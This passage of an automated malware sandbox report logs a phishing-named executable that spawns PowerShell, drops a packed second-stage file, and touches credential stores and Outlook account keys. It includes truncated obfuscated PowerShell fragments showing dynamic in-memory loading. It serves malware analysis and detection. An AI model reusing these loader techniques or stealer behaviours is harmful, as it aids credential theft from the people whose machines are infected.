            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
            Source: Image_Product_Inquiry_Request_Villoslada.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: ent.Automation.pdb source: powershell.exe, 00000002.00000002.2561838270.0000000007846000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeUnpacked PE file: 7.2.Hedgiest165.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeUnpacked PE file: 8.2.Hedgiest165.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeUnpacked PE file: 9.2.Hedgiest165.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .MPRESS1:ER;.MPRESS2:ER;.rsrc:W;
            Source: Yara matchFile source: 00000002.00000002.2574553640.000000000B266000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Leveattest $Ekspartner $Overvariety), (Smaaligheder @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Samarbejdsvilliges = [AppDomain]::CurrentDomain.GetAsse
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pseudoprograms)), $Retsindet).DefineDynamicModule($Demasculinize, $false).DefineType($Kodaker, $Hypochloric, [System.MulticastDelegate
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,7_2_004044A4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04EFCE82 push eax; mov dword ptr [esp], edx2_2_04EFCE94
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 6_2_221C2806 push ecx; ret 6_2_221C2819
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044693D push ecx; ret 7_2_0044694D
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044DB70 push eax; ret 7_2_0044DB84
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_0044DB70 push eax; ret 7_2_0044DBAC
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 7_2_00451D54 push eax; ret 7_2_00451D61
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0044B090 push eax; ret 8_2_0044B0A4
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_0044B090 push eax; ret 8_2_0044B0CC
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_00451D34 push eax; ret 8_2_00451D41
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_00444E71 push ecx; ret 8_2_00444E81
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00414060 push eax; ret 9_2_00414074
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00414060 push eax; ret 9_2_0041409C
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00414039 push ecx; ret 9_2_00414049
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_004164EB push 0000006Ah; retf 9_2_004165C4
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00416553 push 0000006Ah; retf 9_2_004165C4
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 9_2_00416555 push 0000006Ah; retf 9_2_004165C4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Hedgiest165.exeCode function: 8_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,8_2_004047CB
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Image_Product_Inquiry_Request_Villoslada.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
